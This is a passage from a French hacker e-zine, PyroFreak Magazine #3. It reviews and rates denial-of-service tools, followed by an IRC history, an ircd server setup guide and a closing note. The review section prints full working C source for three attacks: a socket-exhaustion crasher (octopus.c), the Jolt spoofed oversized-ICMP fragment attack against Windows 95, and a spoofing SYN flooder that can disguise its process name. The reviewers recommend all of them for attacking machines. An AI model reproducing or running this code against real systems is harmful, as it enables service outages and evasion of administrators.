______________________________________________________________________
Analyse du programme : Aggressor Exploits generator
Auteur(s) : Aggressor Team
URL de téléchargement : Http://www.aggressor.net
OS : Windows 95, 98
Note sur 10 : 9/10
Note(s) du programme(s) : Le programme souvent a de la misère à auto-
configurer le modem mais c'est très facile de
le faire soit même. Aussi, avant d'arrivé à
l'interface de travail du programme, il y a
plusieurs fenêtres pour multiple raisons... Mais
il est vraiment excellent et mérite d'être
téléchargé au plus vite !!!
Option(s) : - Suffer2 (SYN Attack, Spoofed IP)
- Boink (Basé sur Teardrop)
- Land
- OOB Nuker (Spoofed)
- PortScanner
Fonction(s) du programme : Faire des attaques sur différentes machine
Commantaire(s) Additionnel(s) : L'interface Simple et Avancé est très bien!
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

______________________________________________________________________
Analyse du programme : octopus.c
Auteur(s) : N/A
URL de téléchargement : Http://www.rootshell.com
OS : SunOS, Irix, Linux
Note sur 10 : 8/10
Note(s) du programme(s) : Ce petit bébé fait planté une machine ;)

/* This little program opens as many sockets with a remote
* host as can be supported by both. It catches ^C and kill
* commands to shut down cleanly by closing all open connections
* before exiting. Often, a remote workstation can be brought
* to its knees by saturating its process table via multiple
* invocations of sendmail. That's why port 25 (the sendmail
* port) is the default. If the target's process table (set
* when the target kernel was created) is filled, users will be
* unable to execute any shell commands. Many MUDs also crash
* when the number of sockets they have open exceeds a certain
* number. This program will put stress on MUDs by testing
* their limits. If a limit is reached, the MUD will either
* crash or will refuse to let new users log in.
*
* The program is incomplete, in that it doesn't check for
* socket timeouts and subsequently reuse timed out sockets.
* That means the program can only keep a remote host / mud
* locked up until it exhausts its own available new sockets,
* or until it has reached MAX_DESCRIPTORS remote connections
* as set by the #define statement.
*
* If the local machine starts issuing error messages, then
* the program has failed to saturate the remote host and has
* instead reached the limits of the local machine. Use ^C or
* the kill command to terminate it. If you are knowledgable
* about rebuilding kernels and have access to the root account,
* you can build a special kernel that will allow you to reach
* a much larger number of open sockets.
*
* Before running this, be sure to issue the c shell command:
* 'limit descriptors nnn'
* where nnn is the largest descriptor limit, as revealed
* by the 'limit -h' command if applicable. Some unixes may
* not have a descriptors category at all.
*
* This program has been tested with SunOS version 4.1.3, Irix
* version 5, and with Linux.
*
* You don't need to be a privileged user to run it.
*/


#include <stdio.h>
#include <stdlib.h>
#include <bstring.h> /* needed for Irix */
#include <unistd.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h> /* needed for Irix */
#include <sys/socket.h>
#include <signal.h>

#define MAX_DESCRIPTORS 2500

int i, fd[MAX_DESCRIPTORS];

void CatchTERM()
{
printf("\nCaught sig TERM or INT! Cleaning up.\n");
for( ; i>=0; i--) {
if( shutdown( fd[i], 2 ) < 0 ) perror("shutdown");
printf("Closing %i\n", i);
if( close( fd[i] ) ) perror("close");
}
printf("Done. Committing suicide. ARRGH!\n");
exit (1);
}

main(argc,argv)
int argc;
char *argv[];
{
int opt,pid;
struct sockaddr_in sin[MAX_DESCRIPTORS];
char buf[2];

if( argc < 2 ) {
printf("Usage:\t%s address [port]\n", argv[0] );
printf("\twhere address is a numeric internet address\n");
printf("\tand port is an optional port number (default=25)\n");
exit (0);
}
pid = getpid();
opt = 1;
signal( SIGTERM, CatchTERM);
signal( SIGINT, CatchTERM);

for ( i=0; i<MAX_DESCRIPTORS; i++) {
fd[i] = socket(AF_INET, SOCK_STREAM, 0);
if ( fd[i] < 0 ) { printf("socket %i failed\n",i);
perror("socket");
}
else {
/* Someday, the following call will be used to allow socket reuse ... */
/* if ( setsockopt( fd[i], SOL_SOCKET, SO_REUSEADDR, ( char *) &opt,
* sizeof(opt)) < 0 ) {
* printf("setsockopt %i failed\n",i); sleep(10); }
*/

bzero((char *)&sin[i], sizeof(sin[0]));
sin[i].sin_family = AF_INET;
sin[i].sin_addr.s_addr = inet_addr(argv[1]);
sin[i].sin_port = htons((argc > 2) ? atoi(argv[2]) : 25);

if( connect(fd[i], &sin[i], sizeof(sin[0])) < 0) {
printf("connect %i failed.\n",i);
perror("connect");
break;
}


read(fd[i], buf, 1);
printf("pid: %i, desc %i\n", pid, i);
}
}
i--;
printf("closing connection.\n");
for ( ; i>=0; i-- ) { if( shutdown( fd[i], 2) <0) perror("shutdown");
if( close(fd[i]) ) perror("close");
else printf("closed %i\n", i);
}
}

Commantaire(s) Additionnel(s) : Aucun problème de compilation
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

______________________________________________________________________
Analyse du programme : ssping.c 1.0
Auteur(s) : Jeff w. Roberson
URL de téléchargement : Http://www.rootshell.com
OS : Linux
Note sur 10 : 8/10
Note(s) du programme(s) : Fait gellé l'ordinateur de la cible

/* Jolt 1.0 (c) 1997 by Jeff w. Roberson
* Please, if you use my code give me credit. Also, if i was the first to
* find this glitch, please give me credit. Thats all i ask.
*
* Ok so all this does is build a really fraggmented over sized packet
* and once win95 gets it, and puts it back together it locks. I send
* multiple packets by default cause some times it takes a few packets to
* totally freeze the host. Maybe its spending processor time to figure
* out how to put them back together? I've had reports of people blue
* screening from it tho so we'll let Microsoft's boys figure out exactly
* what this does to 95. As of now i haven't tested it on NT, but maybe
* i will later ;). All of this source wasn't origonally written by me
* I just took one of the old programs to kill POSIX and SYSV based
* systems and worked on it abit, then made it spoof =).
* VallaH (yaway@hotmail.com)
*
* Update: It apears to work on some older versions of mac os
*/

/* Yah this is for linux, but i like the BSD ip header better then linux's */
#define __BSD_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <string.h>
#include <arpa/inet.h>

int main(int argc, char **argv)
{
int s,i;
char buf[400];
struct ip *ip = (struct ip *)buf;
struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
struct hostent *hp, *hp2;
struct sockaddr_in dst;
int offset;
int on;
int num = 5;

if (argc < 3) {
printf("Jolt v1.0 Yet ANOTHER windows95(And macOS!) glitch by VallaH (yaway@hotmail.com)\n");
printf("\nusage: %s <dstaddr> <saddr> [number]\n",argv[0]);
printf("\tdstaddr is the host your attacking\n");
printf("\tsaddr is the host your spoofing from\n");
printf("\tNumber is the number of packets to send, 5 is the default\n");
printf("\nNOTE: This is based on a bug that used to affect POSIX complient,
and SYSV \n\t systems so its nothing new..\n"
);
printf("\nGreets to Bill Gates! How do ya like this one? :-)\n");
exit(1);
}
if (argc == 4) num = atoi(argv[3]);
for (i=1;i<=num;i++) {
on=1;
bzero(buf, sizeof buf);

if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW )) < 0) {
perror("socket");
exit(1);
}
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(1);
}

if ((hp = gethostbyname(argv[1])) == NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[1]);
exit(1);
}
} else {
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
}
if ((hp2 = gethostbyname(argv[2])) == NULL) {
if ((ip->ip_src.s_addr = inet_addr(argv[2])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[2]);
exit(1);
}
} else {
bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);
}
printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = htons(sizeof buf);
ip->ip_id = htons(4321);
ip->ip_off = htons(0);
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_csum = 0; /* kernel fills in */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = htons(~(ICMP_ECHO << 8));
for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
ip->ip_off = htons(offset >> 3);
if (offset < 65120)
ip->ip_off |= htons(0x2000);
else
ip->ip_len = htons(418); /* make total 65538 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
if (offset == 0) {
icmp->type = 0;
icmp->code = 0;
icmp->checksum = 0;
}
}
close(s);
usleep(30000);
}
return 0;
}


Commantaire(s) Additionnel(s) : Aucun problème de compilation
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

______________________________________________________________________
Analyse du programme : Syn Flooder
Auteur(s) : Zakath, trurl_ et ultima
URL de téléchargement : Http://www.rootshell.com
OS : Linux
Note sur 10 : 8/10
Note(s) du programme(s) : Fait gellé l'ordinateur de la cible

/* Syn Flooder by Zakath
* TCP Functions by trurl_ (thanks man).
* Some more code by Zakath.
* Speed/Misc Tweaks/Enhancments -- ultima
* Nice Interface -- ultima
* Random IP Spoofing Mode -- ultima
* How To Use:
* Usage is simple. srcaddr is the IP the packets will be spoofed from.
* dstaddr is the target machine you are sending the packets to.
* low and high ports are the ports you want to send the packets to.
* Random IP Spoofing Mode: Instead of typing in a source address,
* just use '0'. This will engage the Random IP Spoofing mode, and
* the source address will be a random IP instead of a fixed ip.
* Released: [4.29.97]
* To compile: cc -o synk4 synk4.c
*
*/

#include <signal.h>
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>
/* These can be handy if you want to run the flooder while the admin is on
* this way, it makes it MUCH harder for him to kill your flooder */

/* Ignores all signals except Segfault */
// #define HEALTHY
/* Ignores Segfault */
// #define NOSEGV
/* Changes what shows up in ps -aux to whatever this is defined to */
// #define HIDDEN "vi .cshrc"
#define SEQ 0x28376839
#define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))

unsigned long send_seq, ack_seq, srcport;
char flood = 0;
int sock, ssock, curc, cnt;

/* Check Sum */
unsigned short
ip_sum (addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return (answer);
}
void sig_exit(int crap)
{
#ifndef HEALTHY
printf("Signal Caught. Exiting Cleanly.\n");
exit(crap);
#endif
}
void sig_segv(int crap)
{
#ifndef NOSEGV
printf("Segmentation Violation Caught. Exiting Cleanly.\n");
exit(crap);
#endif
}

unsigned long getaddr(char *name) {
struct hostent *hep;

hep=gethostbyname(name);
if(!hep) {
fprintf(stderr, "Unknown host %s\n", name);
exit(1);
}
return *(unsigned long *)hep->h_addr;
}


void send_tcp_segment(struct iphdr *ih, struct tcphdr *th, char *data, int dlen) {
char buf[65536];
struct { /* rfc 793 tcp pseudo-header */
unsigned long saddr, daddr;
char mbz;
char ptcl;
unsigned short tcpl;
} ph;

struct sockaddr_in sin; /* how necessary is this, given that the destination
address is already in the ip header? */


ph.saddr=ih->saddr;
ph.daddr=ih->daddr;
ph.mbz=0;
ph.ptcl=IPPROTO_TCP;
ph.tcpl=htons(sizeof(*th)+dlen);

memcpy(buf, &ph, sizeof(ph));
memcpy(buf+sizeof(ph), th, sizeof(*th));
memcpy(buf+sizeof(ph)+sizeof(*th), data, dlen);
memset(buf+sizeof(ph)+sizeof(*th)+dlen, 0, 4);
th->check=ip_sum(buf, (sizeof(ph)+sizeof(*th)+dlen+1)&~1);

memcpy(buf, ih, 4*ih->ihl);
memcpy(buf+4*ih->ihl, th, sizeof(*th));
memcpy(buf+4*ih->ihl+sizeof(*th), data, dlen);
memset(buf+4*ih->ihl+sizeof(*th)+dlen, 0, 4);

ih->check=ip_sum(buf, (4*ih->ihl + sizeof(*th)+ dlen + 1) & ~1);
memcpy(buf, ih, 4*ih->ihl);

sin.sin_family=AF_INET;
sin.sin_port=th->dest;
sin.sin_addr.s_addr=ih->daddr;

if(sendto(ssock, buf, 4*ih->ihl + sizeof(*th)+ dlen, 0, &sin, sizeof(sin))<0) {
printf("Error sending syn packet.\n"); perror("");
exit(1);
}
}

unsigned long spoof_open(unsigned long my_ip, unsigned long their_ip, unsigned short port) {
int i, s;
struct iphdr ih;
struct tcphdr th;
struct sockaddr_in sin;
int sinsize;
unsigned short myport=6969;
char buf[1024];
struct timeval tv;

ih.version=4;
ih.ihl=5;
ih.tos=0; /* XXX is this normal? */
ih.tot_len=sizeof(ih)+sizeof(th);
ih.id=htons(random());
ih.frag_off=0;
ih.ttl=30;
ih.protocol=IPPROTO_TCP;
ih.check=0;
ih.saddr=my_ip;
ih.daddr=their_ip;

th.source=htons(srcport);
th.dest=htons(port);
th.seq=htonl(SEQ);
th.doff=sizeof(th)/4;
th.ack_seq=0;
th.res1=0;
th.fin=0;
th.syn=1;
th.rst=0;
th.psh=0;
th.ack=0;
th.urg=0;
th.res2=0;
th.window=htons(65535);
th.check=0;
th.urg_ptr=0;

gettimeofday(&tv, 0);

send_tcp_segment(&ih, &th, "", 0);

send_seq = SEQ+1+strlen(buf);
}
void upsc()
{
int i;
char schar;
switch(cnt)
{
case 0:
{
schar = '|';
break;
}
case 1:
{
schar = '/';
break;
}
case 2:
{
schar = '-';
break;
}
case 3:
{
schar = '\\';
break;
}
case 4:
{
schar = '|';
cnt = 0;
break;
}
}
printf("[%c] %d", schar, curc);
cnt++;
for(i=0; i<26; i++) {
i++;
curc++;
}
}
void init_signals()
{
// Every Signal known to man. If one gives you an error, comment it out!
signal(SIGHUP, sig_exit);
signal(SIGINT, sig_exit);
signal(SIGQUIT, sig_exit);
signal(SIGILL, sig_exit);
signal(SIGTRAP, sig_exit);
signal(SIGIOT, sig_exit);
signal(SIGBUS, sig_exit);
signal(SIGFPE, sig_exit);
signal(SIGKILL, sig_exit);
signal(SIGUSR1, sig_exit);
signal(SIGSEGV, sig_segv);
signal(SIGUSR2, sig_exit);
signal(SIGPIPE, sig_exit);
signal(SIGALRM, sig_exit);
signal(SIGTERM, sig_exit);
signal(SIGCHLD, sig_exit);
signal(SIGCONT, sig_exit);
signal(SIGSTOP, sig_exit);
signal(SIGTSTP, sig_exit);
signal(SIGTTIN, sig_exit);
signal(SIGTTOU, sig_exit);
signal(SIGURG, sig_exit);
signal(SIGXCPU, sig_exit);
signal(SIGXFSZ, sig_exit);
signal(SIGVTALRM, sig_exit);
signal(SIGPROF, sig_exit);
signal(SIGWINCH, sig_exit);
signal(SIGIO, sig_exit);
signal(SIGPWR, sig_exit);
}
main(int argc, char **argv) {
int i, x, max, floodloop, diff, urip, a, b, c, d;
unsigned long them, me_fake;
unsigned lowport, highport;
char buf[1024], *junk;

init_signals();
#ifdef HIDDEN
for (i = argc-1; i >= 0; i--)
/* Some people like bzero...i prefer memset :) */
memset(argv[i], 0, strlen(argv[i]));
strcpy(argv[0], HIDDEN);
#endif

if(argc<5) {
printf("Usage: %s srcaddr dstaddr low high\n", argv[0]);
printf(" If srcaddr is 0, random addresses will be used\n\n\n");

exit(1);
}
if( atoi(argv[1]) == 0 )
urip = 1;
else
me_fake=getaddr(argv[1]);
them=getaddr(argv[2]);
lowport=atoi(argv[3]);
highport=atoi(argv[4]);
srandom(time(0));
ssock=socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if(ssock<0) {
perror("socket (raw)");
exit(1);
}
sock=socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
if(sock<0) {
perror("socket");
exit(1);
}
junk = (char *)malloc(1024);
max = 1500;
i = 1;
diff = (highport - lowport);

if (diff > -1)
{
printf("\n\nCopyright (c) 1980, 1983, 1986, 1988, 1990, 1991
The Regents of the University\n of California. All Rights Reserved."
);
for (i=1;i>0;i++)
{
srandom((time(0)+i));
srcport = getrandom(1, max)+1000;
for (x=lowport;x<=highport;x++)
{
if ( urip == 1 )
{
a = getrandom(0, 255);
b = getrandom(0, 255);
c = getrandom(0, 255);
d = getrandom(0, 255);
sprintf(junk, "%i.%i.%i.%i", a, b, c, d);
me_fake = getaddr(junk);
}

spoof_open(/*0xe1e26d0a*/ me_fake, them, x);
/* A fair delay. Good for a 28.8 connection */
usleep(300);

if (!(floodloop = (floodloop+1)%(diff+1))) {
upsc(); fflush(stdout);
}
}
}
}
else {
printf("High port must be greater than Low port.\n");
exit(1);
}
}





Commantaire(s) Additionnel(s) : Problème de compilation ;))
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Conclusion : Donc, voilà pour ce zine. Continuer à le lire et souvenez-vous qu'à
chaque ezine que Pyro-Phreak mag va sortir, il va y avoir une section
comme cella qui va vous faire part des bons programmes qu'il existe.



____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3
:
| Les IRCD (Internet Relay Chat Deamon)
'.________ __ __ ___________ ____ ______________ ____Par Nuclear__ __

P.S:Essayer de pas voir les fautes d'orthographes:))

Dans l'article qui va suivre, je vais vous expliquez comment cree un serveur IRC (IRCD).
Cela peux-etre tres utiles si vous avez un Modem Cable ou une ligne ISDN.
Je vais vous dire tout ce que je sais sur ses serveurs, et vous dire comment l'installer et le Linker
a d'autres serveurs (Configurer en HUB ou CService 5.1 et Uworld 8.1)

Pour commencer voici l'histoire d'IRC et les dates importantes:
Aout 88 - Premier Serveur irc (tolsun.oulu.fi)
Aout 89 - Premer Clients irc cree par Michael Sandrof (BigCheese)
Enfin pu besoin d'utiliser un Emulateur Telnet
Juin 90 - 2.5beta Creation de channels, avant on avais selement 1 channels principal
Juillet 90 - 12 users on 38 servers (un record a cette date)
Aout 90 - Association entre les serveur EFnet (Eris Free) et Anet (Anarchy)
Sep 90 - 86 serveurs linker sur le reseau de EfNet et Anet
Sep 90 - 41 users 86 servers (du a l'alience de Efnet et Anet)
Nov 90 - version 2.6 released (ircd Hybrid 2.6)
Dec 90 - ircII 2.0beta10 (un clients Unix)
Jan 91 - ircd version 2.6.1 adds flow control..
Feb 91 - Record 8.8 gigs de message irc et d'autres on passer dans le reseau de Efnet
Mar 91 - 135 servers 69 us 66 non us Oct 91 - 399 users 120 servers 44 opers
Été 92 - Premiere ICMP attacks sur les serveur de efnet
xxxx 94 - irc.colorado.edu hits 1000 users (Record abatus! 1000 usager sur le serveur,
hehe sai pas a quoi yetais linker lui)
Plus tard en 94 - IRC hits 5,000 users
Oct 95 - IRC hits 15,000 users (boum la l'irc est bien connu.)
Fev 96 - Nouveau record: 1556 user on chatter en meme temps sur le channels #quake
Avril 97 - en Avril 1997 30,000 users sur le meme serveur
Oct 97 - smurf.c est distribuer a tout ceux qui desirais faire des attaque a efnet ,efnet en a beaucoup
souffert!
Jan 98 - IRC hits 40,000 users
Sep 98 - irc.blackened.com Ce serveur de efnet a supporter 8000 clients.
Fev 99 - irc.idle.net le mois passer ce serveur efnet a supporter 10000 clients.
Fev 99 - IRC hits 50,000 users

Bon, c'était la petite histoire IRC, maitenent voici comment vous cree un serveur sous linux et Unix
(desole pour ceux en win9x ou nt... les serveurs en win son toujours en split! je perd pas mon temps avec ca!:
Premiere chose, se trouver un ircd... Je vous conseille IRCU2.10.04, le 2.10.05 est sortie mais il
y a encore beaucoup de bug...
Vous pouvez trouver le serveur ircu a http://www.routing-com.undernet.org.
Maintenant ,il ne vous reste qu'a installer celui-ci...
Decompresser le fichier .tar.gz qui devrais ce retrouver dans le dir /ircu2.10.04
faites ./configure apres make config la ces un peux plus compliqué, mais avec plusieurs essaient, ca
devrais marcher.
La moitié de la configuration est faite.
Apres tapez make ensuite make install.
Bon tout est la, il ne vous reste seulement a cree un fichier ircd.conf (vous devez le cree dans le
repertoire que vous avez specifié dans make config), pour vous aider aller a www.routing-com.undernet.org
,dans Exemple IRCD.CONF. Ensuite, l'enregistrer dans un fichier ircd.conf et le configurer selon
vos besoins. Il y a de l'aide en anglais sur la pages que je viens de vous donnez pour bien le configurer
Maintenant, tester votres ircd en tappent ./ircd ,dans le repertoir que vous avez specifier pour mettre
les fichiers executables. Tester ensuite si ca marche en vous connectant a votre serveur .
Si ca marche ces deja tres bien... sinon recompiler votres ircd en debug mode... il va vous dire ou son
les problemes quand vous aller le starter... Ensuite Uworld et Cservice voice les C/N et U lines a
additionnner dans votres ircd.conf :
Uworld:
C:216.46.2.35:uw8nuc:Uworld.NewNet.Optima-Dialup.Com:6651:80
N:216.46.2.35:password:Uworld.NewNet.Optima-Dialup.Com:6651:80
bon voici la description:
L'IP DE LA MACHINE:LE PASSWORD:LE NOM DU SERVEUR QUI SE CONNECT A VOUS:LE PORT A UTILISER:80
Le N: ces la meme chose
Les U lines:
U:Uworld.NewNet.Optima-Dialup.Com::
U:Uworld2.Newnet.Org::*
U:Channels.NewNet.Optima-Dialup.Com::*
U:Channels2.Newnet.Org::*
Ca c'est vraiment Simple vous ecrivez: U:LE NOM DU SERVEUR::*
vous devez seulement le mettres pour les serveur Uworld X2 ou CS ,car c'est les lignes qui font que
les Services sur ces serveurs peuve se op... Ces tout pour le moment ... Si je pense a de quoi qui
pourais plus vous aidez je vais le mettres dans le #4 . Si vous avez besoin de plus d'aide vous pouvez
me rejoindre au serveur: newnet.optima-dialup.com sur le channel #cservice, sous le nick de: NuClEaR
ou par e-mail a admin@info-shell.com si vous chercher des bon shell et pas cher: http://www.info-shell.com
P.S: Je

  
cherche des serveurs assez rapides pour linker au mien... si ca vous interesse contacter moi...
En passant, vener faire un tour sur /server newnet.optima-dialup.com ,vous avez un W et X a votres
disposition, et des IRCop tres corect! (Snowcrach, PsYkAoS, NuClEaR, Neuro & [Ewoks]...



____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3
:
| Conclusion
'.________ __ __ ___________ ____ ______________ ____Par Neuro__ __

Bon, c'est la fin, si vous lisez ceci, c'est surement que vous avez asser
aimer le mag pour le lire jusqu'a la fin,tk,j'espere que vous avez aimer.
Si vous désirer faire publier votre article dans le #4, envoyez le a
pyrofreakmag@hotmail.com , ou via IRC (#phreak.fr UNDERNET)
Site web:http://pyrofreak.cjb.net . Le #4 est fixer pour environ le 1er Mai. Pour commentaires
ou suggestions : pyrofreakmag@hotmail.com


Site du mois(pub):
http://shivatek.citeweb.net

@@@@@@@@@@@@@@@@@@@@Pyrofreakmag touts droits réservés@@@@@@@@@@@@@@@@@@@@@@

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT